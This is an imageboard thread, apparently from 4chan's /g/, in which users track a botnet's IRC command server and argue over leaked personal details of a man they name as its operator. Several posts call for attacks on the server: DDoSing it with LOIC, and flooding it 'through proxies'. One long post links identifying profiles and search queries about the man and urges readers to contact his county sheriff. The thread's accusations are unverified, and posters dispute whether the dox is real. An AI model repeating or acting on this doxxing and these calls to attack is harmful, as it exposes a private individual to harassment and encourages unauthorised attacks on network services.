Delete the thread, the kids have taken over.

>> No.24454549
File: 55 KB, 663x645, RIP.png

R.I.P Botnet. It was fun <3

>> No.24454552

>>24454492
Do it.

>> No.24454564
File: 133 KB, 990x611, 1323809166067.jpg

>>24454545
No, you old partay poopa.

>> No.24454650

>>24454564
Collecting a bunch of information gathered by other people is hardly a 'party'. I know skids always have to smear their shit on everything.

>> No.24454684

>>24454650
you seem quite upset

>> No.24454734

Grabbed more or less everything from the thread. Someone else can format it nicely.

http://pastebin.com/xpB4euv1

>> No.24454761

>>24454549

Well, this server has a lot of active IP addresses on it. The Netherlands one. I'm going to go through that server tonight and see if I can't dig up anything.

>> No.24454762

>>24454684
>lulz we compiled the official dOxX
>we hackers now
>u mad?

>> No.24454775

>>24443266
>>24443266
>>24443266
>>24443266


where does this one connect to? i cant find anything.

>> No.24454791

>>24454762
do you see the word ``hacker'' in here?

>> No.24454822

>>24454650
>>24454564
>>24454492
I don't see why this is a problem.

His intention of compiling the results on a pastebin is preferred to having some anons repost random bits repeatedly, which in turn refer to other repostings.

Organization.

>> No.24454837

highly doubt it's his dox.

>> No.24454873

PLEASE READ:

How about we regroup around 11 pm EST on /g/ and we'll collaborate again and see what we have come up with.

Cool guys?

>> No.24454876

>>24454837
have you read some of his posts? He really is that dumb.

>> No.24454899

>>24454876

Still don't believe it, I know for a fact a lot of node owners use other people's personal info when registering.

If it was his, and he was worried the server would be down and the domain gone.

>> No.24454900

>>24454791
No, but your willingness to compile "teh official dox" is a testament to your skid shit, the necessary information has been forwarded to the authorities already, you're only trying to turn this into some kind of skiddie war, THIS WILL eventually end up on /b/. Stop fagging this shit up.

>> No.24454905

>>24454791
The only thing any of us have been doing the whole time, is just falling down the rabbit hole.
And getting further to something interesting by doing nothing special, the most anyone here did was read into the original EXE.

>>24454837
Me too.

No way in hell he had his real name on a whois owner of a server.

>> No.24454916

>>24454876
Or he's pretending to be that dumb; not a bad move if you can afford it. I'm not sure, it could be either.

>> No.24454936
File: 1.01 MB, 312x176, 1332594294854.gif

>>24454900

>> No.24454966

>>24454899

Also the c&c server was posted weeks ago, and it's still going and stronger, recruiting more bots everyday after being reported to the authorities and nothing has happened.

I am starting to think /g/ is retarded and filled with kids who get a boner over a botnet.

>> No.24454970

>>24454936
lulz xD

>> No.24454982

>>24454916
Hold against him that he wrote a hacker GUI in Visual Basic. Even if that was a scam.

>> No.24454988

Can't we just DDoS the C2 server? From what I gather he's using a centralised IRC. LOIC TEIM!?

>> No.24454992

>>24454899

I'm trying to take this shit down. Fuck him.

>> No.24455008

You better start believing in botnets, BECAUSE YOU'RE IN ONE

>> No.24455014

>>24454988

The irc server is probably on a 1 or 2gb/s line.

>>24454992

Enjoy wasting your time.

>> No.24455040

>>24455008
Out this december, starring brendan johnston and Robert Mueller.

>> No.24455052

>>24455014
you obviously don't understand what DoS is
it's not just about bw

>> No.24455053

>>24454992
>Can't even tell the difference between IRC and mIRC
>tries to take down a host

>> No.24455067

>>24455052

If you don't have a botnet, you won't touch the server.

take your loic and go back to /b/

>> No.24455077
File: 169 KB, 856x362, the code.png

>>24454992
>>24455053
Sorry, but this.

Pic related.

>> No.24455082

>>24455052
>>24455014
>>24454992
Now this is going places, good bye gentlemen.

>> No.24455135

>>24455053

Shut the fuck up.

>> No.24455136

>>24454992

>Says the person who can't even use IRC

>>24453768

>> No.24455140

The host allowing the botnet is corrupted, they have hosted a lot, mainly malicious stuff.

>> No.24455177

>>24455136

Because I was using an online IRC client I've never used before.

>> No.24455195
File: 84 KB, 300x288, stop-sign1[1].jpg

>>24455177

>> No.24455200

>>24455177

I'll repeat dumbass, the server had 3k before it went down.

The line would easily be 1-2gb/s and even bigger, you won't touch it with LOIC.

You'd need a 2-3k botnet at least to reach that type of bandwidth.

Also, has anybody got information on the other guy in the server?

>> No.24455260

>>24455200

I'm not talking about LOIC'ing it. No shit I wouldn't be able to touch it but there is ALWAYS a way.

>> No.24455269

>>24455260

What other way you spastic, you couldn't even join the server.

It took you hours.

>> No.24455277

iirc there is a big hole in anope
allows for reverse shell etc

>> No.24455295

>>24455140
You're probably right.


###WARNING###
Brendan is now clearly samefagging this thread. He's making it seem like the dox are fake, or of someone else.

They're fucking not. They're legit.

The email he uses everywhere is [email protected] BMJ, aka Brendan M. Johnston. Plus Brendan J is on fucking everything he's ever registered or posted. Plus he has posts going back 5 years ago saying his name is Brendan. Plus he's been proven to be fucking stupid.

THINGS PEOPLE CAN DO:

Report all of his domains to their respective domain registrars. Many have fake info, and many are hosting malware or botnet servers.

ALSO, CONTACT HIS COUNTY SHERIFF'S DEPARTMENT:

http://www.edcgov.us/Sheriff/
http://www.edcgov.us/Sheriff/
http://www.edcgov.us/Sheriff/

You bug the FBI and local police enough, and they'll definitely start looking into him. Tell them he's responsible for owning and spreading various botnets, and owns the Darkshades malware.

Don't bother trying to DoS the IRC server; however, flooding it could be somewhat effective and will probably piss them off. Just be sure to use proxies.

Ignore all people in this thread saying the info is fake. They're all from Hackforums and are trying to protect their precious bots and their investment, or are Brendan himself.

>> No.24455332

>>24455295

You have no proof it's the info, all you did was check where it was registered which could easily be faked.

You also claimed to have gotten the dox minutes after the thread was posted, go watch your hackers film.

>> No.24455354

>>24455295

Saved. I will be doing this.

>> No.24455398

I got shit to do guys, Nice job everybody.

>> No.24455401

>>24455332
Some of the info was posted a week ago. It's super easy to post an email into google and see what comes up.
http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html

>> No.24455418

>>24455295
done.

>> No.24455423

>>24455401

And it's still up after how many reports, good job failing and collecting a fake dox.

>> No.24455459
File: 44 KB, 1129x763, Untitled.png

LOL do they browse /g/?

>> No.24455466
File: 60 KB, 378x301, 1319451299446.jpg

>>24455418
gtfo Brendan

>> No.24455513

>>24455423
>Expecting government to act quickly
2012

>> No.24455531

>>24455513

It's been weeks, retard.

Also the host could be bullet proof hosting or offshore so it will remain up.

>> No.24455533

>>24455332
Yes I have fucking proof, you god damn idiot.

Google '"[email protected]" "brendan"'
Google 'blade_v1per brendan'

Read this: http://s1.zetaboards.com/leader_bible/topic/801305/1/
Read this: http://www.xfire.com/profile/bladev1per/
Read this: http://forums.zybez.net/topic/1374304-exodus-second-birthday/

Look at all the results.

Go the fuck away, Brendan. Shouldn't you be busy finding a lawyer to hire?

>> No.24455552

>>24455533
>implying because you found his first name his dox is correct and not faked.

Good job.

>> No.24455586

>>24455423
Police aren't going to take down sites or arrest someone in the course of 6 hours, moron. Which is when the dox were first posted. Even if it takes them days or weeks, he (or perhaps you, lol) is going to be in deep shit.

>>24455552
Are you saying he's used a fake name for his email, all his business dealings, and every website he's ever gone on, since he was 16 years old?

Ok.

>> No.24455594

>>24455552
http://whois.domaintools.com/bv1.biz

>> No.24455604

>>24455594
see
>>24454899

>> No.24455606

>>24455531
>2003
MISSION ACCOMPLISHED
>2012
Still there

>weeks
>years

>> No.24455613

I'll repeat once more, Brendan and his skiddie cronies are samefagging this thread up. Ignore them and laugh at them.

>> No.24455626

>>24455613

No, but i am someone who follows botnets on a daily day, and what you spew is ridiculous at best.

You have been watching too many films.

>> No.24455658

>>24455626

I also follow botnets on a daily day. BV1 is in deep shit.

>> No.24455660

>>24455606
>implying it takes weeks for a host to suspend your domain
>implying they cant see the 30k bots straining the server and completing wasting bandwidth.

/g/ confirmed for linux kiddies who know nothing.

>> No.24455671

>>24455658

If you had his real info, maybe.

>> No.24455674

>>24455626
Then please perform your own investigation on this person and tell me what info you can confirm of his. And please tell us where you see any information that conflicts.

I've dealt with dozens of idiots like Brendan. "Hackers" who own shittons of domains who leave tracks everywhere. You either have no idea what you're talking about or you're spreading disinformation to help Brendan.

>> No.24455690

>>24455660
The host may be malware-friendly, unfortunately. They're European, so American authorities can't do much about it with a lot of work.

Even if it takes a while for something to happen, law enforcement will definitely begin an investigation on this guy if they receive enough reports.

>> No.24455698

>>24455690

By the time something happens, they would move hosts, etc....

Honestly, it's like /g/s first botnet find.

>> No.24455765

>>24455660
see
>>24455690
>implying anything Amerifagia does will have a quick response in Eurofagia
>"completing" missining the point

>> No.24455830

>>24455765

And that's a good reason why it will be ignored.

A botnet of that size, after being reported and exposed, usually gets suspended in 24 hours, or the following week.

But the bot could easily have multiple servers it connects to we don't know about, so it's a win/lose situation.
